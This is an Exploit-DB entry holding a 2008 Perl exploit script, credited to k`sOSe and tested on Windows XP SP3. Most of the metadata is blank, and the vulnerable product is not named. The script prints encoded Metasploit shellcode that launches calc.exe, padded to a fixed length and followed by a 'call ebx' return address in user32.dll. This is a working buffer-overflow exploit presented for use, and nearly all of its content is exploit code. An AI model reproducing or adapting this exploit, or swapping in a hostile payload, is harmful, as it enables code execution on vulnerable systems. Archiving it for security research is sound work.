Perl Shellcode Exploit

vendor:

by:

k`sOSe

7.5

CVSS

HIGH

Shellcode exploit

CWE

Product Name:

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3

2008

This Perl script exploits a vulnerability to execute shellcode. It utilizes the x86/shikata_ga_nai encoder from Metasploit and calls the user32.dll function to execute the calc.exe program. The exploit is tested on Windows XP SP3.

Mitigation:

Unknown

Source

Exploit-DB raw data:

#!/usr/bin/perl
# k`sOSe - 07/29/2008

use warnings;
use strict;

# http://www.metasploit.com
# EXITFUNC=seh, CMD=c:\WINDOWS\system32\calc.exe
# [*] x86/shikata_ga_nai succeeded, final size 169
my $shellcode = "\xd9\xca\xd9\x74\x24\xf4\x5e\xb8\xf5\x65\x2d\xfb\x31\xc9\xb1" .
		"\x24\x31\x46\x19\x83\xee\xfc\x03\x46\x15\x17\x90\xd1\x13\x93" .
		"\x5b\x2a\xe4\x90\x19\x16\x6f\xda\xa4\x1e\x6e\xcd\x2c\x91\x68" .
		"\x9a\x6c\x0e\x88\x77\xdb\xc5\xbe\x0c\xdd\x37\x8f\xd2\x47\x6b" .
		"\x74\x12\x03\x73\xb4\x58\xe1\x7a\xf4\xb7\x0e\x47\xac\x63\xeb" .
		"\xcd\xa9\xe0\xac\x09\x33\x1d\x34\xd9\x3f\xaa\x32\x82\x23\x2d" .
		"\xae\xb6\x40\xa6\x31\x22\xf1\xe4\x15\xb0\xc1\x4b\x67\x4e\xa5" .
		"\x25\xe3\x25\x60\xf9\x60\x79\x61\x72\x06\x66\xd4\x0f\x8f\x9e" .
		"\xaf\xf7\xd3\x5f\xc5\x57\xbc\xaf\x90\x53\x63\x38\x3d\xa5\x11" .
		"\xb6\x6a\xa6\xc1\xa4\xae\x04\x59\x62\x81\xf0\x2a\x23\x4e\xa4" . 
		"\xc7\xb2\x03\x20\x4d\x28\xd7\xfa\xd1\xd1\x76\x96\x8a\x3b\x1c" .
		"\x1e\x28\x44\xd4";

print	$shellcode	.
	"\x41" x (218 - length($shellcode)) .
	"\x32\x4c\x3c\x7e" ; # call ebx  user32.dll  winxp sp3

# milw0rm.com [2008-07-29]